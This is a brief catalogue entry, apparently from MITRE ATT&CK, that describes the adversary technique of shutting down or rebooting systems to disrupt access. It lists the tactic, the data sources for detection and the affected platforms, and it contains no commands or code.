Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre